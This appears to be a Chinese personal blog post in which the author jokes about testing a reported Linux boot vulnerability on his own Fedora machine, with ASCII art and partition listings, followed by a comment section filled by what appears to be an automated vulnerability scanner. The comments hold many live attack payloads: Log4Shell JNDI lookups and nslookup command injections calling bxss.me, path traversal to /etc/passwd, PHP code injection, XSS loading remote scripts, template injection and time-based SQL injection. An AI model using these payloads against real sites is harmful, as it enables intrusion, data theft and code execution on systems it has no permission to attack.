开始看到这个漏洞,简直无法相信,我靠,逆天大后门?然后在自己机器狂按了几分钟,手都快脱臼了,反馈给我的只有不断的/etc/issue信息
\
\ __---__
_- /--______
__--( / \ )XXXXXXXXXXX\v.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\
/XXXXX( )--_ XXXXXXXXXXX\
/XXXXX/ ( O ) XXXXXX \XXXXX\
XXXXX/ / XXXXXX \__ \XXXXX
XXXXXX__/ XXXXXX \__---->
---___ XXX__/ XXXXXX \__ /
\- --__/ ___/\ XXXXXX / ___--/=
\-\ ___/ XXXXXX '--- XXXXXX
\-\/XXX\ XXXXXX /XXXXX
\XXXXXXXXX \ /XXXXX/
\XXXXXX > _/XXXXX/
\XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
\XXXXXXXXXXXXXXXXXXXXXXXXXX/
VXXXXXXXXXXXXXXXXXXV
是不是很萌~。~
最后看了原文发现触发此漏洞需要一个前提条件。
/dev/sda1: LABEL="Windows7_0S" UUID="E4B85589B8555ADE" TYPE="ntfs" PARTUUID="167b5d84-01"
/dev/sda2: UUID="wQ04tk-pZSp-nRFw-m0ii-4L2Y-9ie8-gM5hyp" TYPE="LVM2_member" PARTUUID="167b5d84-02"
/dev/sda3: UUID="12c245f2-6788-4e6d-b60d-aa5e795bdfb2" TYPE="ext4" PARTUUID="167b5d84-03"
/dev/sda5: UUID="Xzgqfc-JSJE-Wdhm-TLn6-dfK6-YbnR-ZZgsED" TYPE="LVM2_member" PARTUUID="167b5d84-05"
/dev/mapper/fedora-swap: UUID="515583ce-7cc4-41ce-8241-0c756f963f43" TYPE="swap"
/dev/mapper/fedora-root: UUID="e52e1aa2-f581-464c-af9e-eeebf9d69d47" TYPE="ext4"
/dev/mapper/fedora-home: UUID="8ff0838e-39b0-4e2b-b10c-0cb66901cddf" TYPE="ext4"
/dev/loop0: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
/dev/mapper/docker-253:1-2363736-pool: UUID="6dc87128-30c5-43b6-9f7c-5901a0740db3" TYPE="ext4"
没有加密分区,可以安心午睡了。
评论
<esi:include src="http://bxss.me/rpb.png"/>
${9999491+9999370}
9TcySDqd
${j${::-n}di:dns${::-:}//hitizsghhbmew3fe5a${::-.}bxss.me}zzzz
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
response.write(9459926*9802430)
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
'+response.write(9459926*9802430)+'
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}//dns.log4j..-1245..2ea7a${::-.}1${::-.}bxss.me}}
&n947560=v976800
"+response.write(9459926*9802430)+"
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
bxss.me
!(()&&!|*|*|
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
^(#$!@#$)(()))******
/xfs.bxss.me
ctime sleep p0 (I30 tp1 Rp2 .
'.gethostbyname(lc('hitwn'.'vmkfoddu62ee7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(81).chr(106).chr(89).'
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1epmGgCEO
".gethostbyname(lc("hitfj"."eqbzzhcz6accf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(90).chr(116).chr(79)."
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
echo snihcc$()\ axutjs\nz^xyu||a #' &echo snihcc$()\ axutjs\nz^xyu||a #|" &echo snihcc$()\ axutjs\nz^xyu||a #
&echo ohnqzg$()\ wgtran\nz^xyu||a #' &echo ohnqzg$()\ wgtran\nz^xyu||a #|" &echo ohnqzg$()\ wgtran\nz^xyu||a #
'.print(md5(31337)).'
"+"A".concat(70-3).concat(22*4).concat(116).concat(82).concat(97).concat(89)+(require"socket" Socket.gethostbyname("hitgn"+"qrkzswhf13951.bxss.me.")[3].to_s)+"
|echo hrnmit$()\ kfnarv\nz^xyu||a #' |echo hrnmit$()\ kfnarv\nz^xyu||a #|" |echo hrnmit$()\ kfnarv\nz^xyu||a #
HttP://bxss.me/t/xss.html?%00
(nslookup hitrmdnqsegvc96b2b.bxss.me||perl -e "gethostbyname('hitrmdnqsegvc96b2b.bxss.me')")
'+'A'.concat(70-3).concat(22*4).concat(106).concat(86).concat(113).concat(89)+(require'socket' Socket.gethostbyname('hitiw'+'hojfygvy1424e.bxss.me.')[3].to_s)+'
bxss.me/t/xss.html?%00
$(nslookup hitttnvvkimjr8b25b.bxss.me||perl -e "gethostbyname('hitttnvvkimjr8b25b.bxss.me')")
&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&'\"`0&(nslookup hitbmmnlbxepb80074.bxss.me||perl -e "gethostbyname('hitbmmnlbxepb80074.bxss.me')")&`'
comments
|(nslookup hitptrhjwqczs5aea2.bxss.me||perl -e "gethostbyname('hitptrhjwqczs5aea2.bxss.me')")
comments/.
`(nslookup hitlilbmtcdxf20f94.bxss.me||perl -e "gethostbyname('hitlilbmtcdxf20f94.bxss.me')")`
'"()&%<acx><ScRiPt >NmfC(9110)</ScRiPt>
'"()&%<acx><ScRiPt >NmfC(9357)</ScRiPt>
9683127
acu2547<s1﹥s2ʺs3ʹuca2547
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
<ScRiPt >NmfC(9055)</ScRiPt>
<WDG708>HB98Z[!+!]</WDG708>
<script>NmfC(9000)</script>
<ScR<ScRiPt>IpT>NmfC(9121)</sCr<ScRiPt>IpT>
<ScRiPt >NmfC(9689)</ScRiPt>
<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9416></ScRiPt>
<isindex type=image src=1 onerror=NmfC(9629)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9456'>
<body onload=NmfC(9661)>
<img src=//xss.bxss.me/t/dot.gif onload=NmfC(9378)>
<img src=xyz OnErRor=NmfC(9610)>
<img/src=">" onerror=alert(9420)>
%0A%3C%53%63%52%69%50%74%20%3E%4E%6D%66%43%289552%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\NmfC(9963)\u003C/sCripT\u003E
<ScRiPt>NmfC(9205)</sCripT>
<input autofocus onfocus=NmfC(9082)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{acu:Expre/**/SSion(NmfC(9901))}
Yvczs <ScRiPt >NmfC(9614)</ScRiPt>
<WY1QYQ>VOCVM[!+!]</WY1QYQ>
<ifRAme sRc=9992.com></IfRamE>
<a36Fqu6 x=9286>
<img sRc='http://attacker-9109/log.php?
<aLeiGdL<
7FhewNKH
-1 OR 2+11-11-1=0+0+0+1 --
-1 OR 2+784-784-1=0+0+0+1
-1' OR 2+660-660-1=0+0+0+1 --
-1' OR 2+926-926-1=0+0+0+1 or 'jZftvM15'='
-1" OR 2+941-941-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
QTXkDb35'; waitfor delay '0:0:15' --
-5 OR 98=(SELECT 98 FROM PG_SLEEP(15))--
-5) OR 778=(SELECT 778 FROM PG_SLEEP(15))--
-1)) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
Gj95kppB' OR 313=(SELECT 313 FROM PG_SLEEP(15))--
yZGlmzI3') OR 837=(SELECT 837 FROM PG_SLEEP(15))--
heXJ4bHM')) OR 397=(SELECT 397 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
@@OmJI1